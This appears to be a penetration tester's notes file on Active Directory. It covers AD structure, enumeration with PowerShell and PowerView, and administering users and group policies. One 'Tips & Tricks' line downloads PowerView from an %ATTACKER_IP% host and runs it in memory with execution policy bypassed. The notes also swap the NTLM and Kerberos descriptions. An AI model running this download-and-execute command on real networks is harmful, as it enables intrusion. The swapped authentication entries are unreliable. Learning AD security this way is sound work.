killchain-compendium/Miscellaneous/Active Directory/active_directory.md

187 lines
6.2 KiB
Markdown
Raw Normal View History

2022-11-13 16:00:22 +01:00
# Active Directory Enumeration
* Offers authentication in the form of centralized __IAM__ a.k.a __SSO__ and authentication via __Policy Management__
* There are user accounts acting on machine accounts (services), in general
* Consists of
* __Domain Controller__
* __Organizational Units__, (security principals) can be common user or machine accounts
* Users
* Groups
* __Trusts__
* __AD Domains__
* __AD Forest__
* __Policies__
* Administrative accounts are
* __Domain Admin__
* __Enterprise Admin__
* __Schema Admin__
* __Server Operator__
* __Account Operator__
## Domain Controller
* AD Domain Services (AD DS) data store stores all objects on the network
* Authentication and authorization
* Update replication / sync with other domain controllers in the forest
* Administration of domain resources
### AD DS Store
* Database of directory info such as users, groups and services
* `ntdis.dit` contains the information, including password hashes
* `SystemRoot%\NTDS`
### Forest
Consists of the following objects
* __Trees__, hierarchy of domains in the AD Domain Services
* __Domains__, groups of objects
* __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources
* __Trusts__, allows users to access resources in a different domain
* __Objects__ users, groups, printers, computers or shares
* __Domain Services__, DNS, LLMNR, SMB
* __Domain Schema__, Rules for object creation
### Users
* __Domain Admin__, DC access
* __Server Accounts__, service maintenance, may have admin permissions
* __Local Admin__, administrative persmission on an object but not the DC
* __Domain Users__, average user account on a local machine which may have admin permissions
* __Machine users__,
* Machine accounts have local administrational permissions
* Can be recognized by a `$` at the end of the ID
* Their passwords are rotated on a schedule
* Passwords are 120 characters long per default
### Security Groups
Important groups are the following
* __Domain Controllers__, every DC in the domain
* __Domain Admins__, dc access
* __Server Operators__, administration of domain controllers but not groups
* __Backup Operators__, full read access to any file
* __Account Operators__, able to provision accounts
* __Domain Users__, every user account in the domain
* __Domain Computers__, every machine account in the domain
* [Security Groups doc](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups)
### Policies
* Rule sets
* Apply to a domain
* Enable or disables services on a domain basis, like antivirus and malware scanning
* __Disable Windows Defender__
* Communication signing, e.g. SMB
### Domain Services
* __LDAP__
* __Certificates__ handling for services, CRL
* __DNS, LLMNR, NBT-NS__
### Authentication
* __NTLM__, ticket granting service
* __Kerberos__, challenge/response via hashes
## Enumration
* Cmdlets on Domain Controller
* Get some help, `Get-Help Get-Command -Examples`, `Get-Command Get-*`
* From `ActiveDirectory` module
```sh
Import-Module Active-Directory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
```
* `systeminfo | findstr Domain`
* `Get-ADUser -filter *`
* Use found CN and DC and specify
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
### Powerview Module
* [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
```sh
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
Get-NetForest
Get-NetDomainTrust
```
### DNS
* Check ip via `ipconfig`
* `nslookup`, then `server <LocalIP>` and zone transfer via
```sh
ls -d <Domain>
```
### Tips & Tricks
* Download and execute in one line
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
ew.ps1'); Get-NetUser | select samaccountname, description"
```
## Configuration
### Configure Users and Groups
* Use Start -> "Active Directory and Computers" to provision AD objects via __organizational units (OU)__
* A set of users as a group with set policies are defined as __organizational unit (OU)__
* A user is unique to a single OU
* Default OUs are the following
* __Builtin__
* __Users__, user accounts
* __Computers__, machine accounts
* __Domain Controllers__, contains DC in the domain
* __Managed Service Accounts__, service accounts in the domain
* To __delete__ a OU use `View` -> `Advanced Features`. Properties menu of the OU via right click shows the checkbox `Protect object from accidental deletion` under `Object` tab -> uncheck it and delete the OU afterwards
* To __delegate__ open properties with right click -> `Next` -> `Delegate Control` -> `Add` -> Choose user and OK -> `Next` -> Choose tasks to delegate -> `Next` -> `Finish`
* To __change__ a user password via powershell
```sh
Set-ADAccountPassword <user> -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
```
* To let the user __change__ the password at the next login
```sh
Set-ADUser -ChangePasswordAtLogon $true -Identity <username> -Verbose
```
### Managing Machine Users
* `Computer` OU should be split into at least `Workstations` and `Servers`
### Group Policies
* __Group Policy Objects__ are applied to OUs
* Use the application `Group Policy Management` to apply policies to UOs
* GPOs under `Group Policy Objects` for the specific domain can be modified. These will be inherited to all UOs. You can see the links to the OUs on the right hand site if you click the GPO on the left
* Child OUs inherit the policies from parent UOs
* `Security Filters` can be set as well here
* The `Settings` tab of a policy shows its actual content
* Right click on a Policy -> `Edit` to change the content of the policy. There are templates for multiple common policies
* `SYSVOL` as a SMB share is used to distribute the GPOs in the domain, it maps to `C:\Windows\SYSVOL\sysvol\` on the domain controller
* To force an update of changed policies across the domain do
```sh
gpupdate /force
```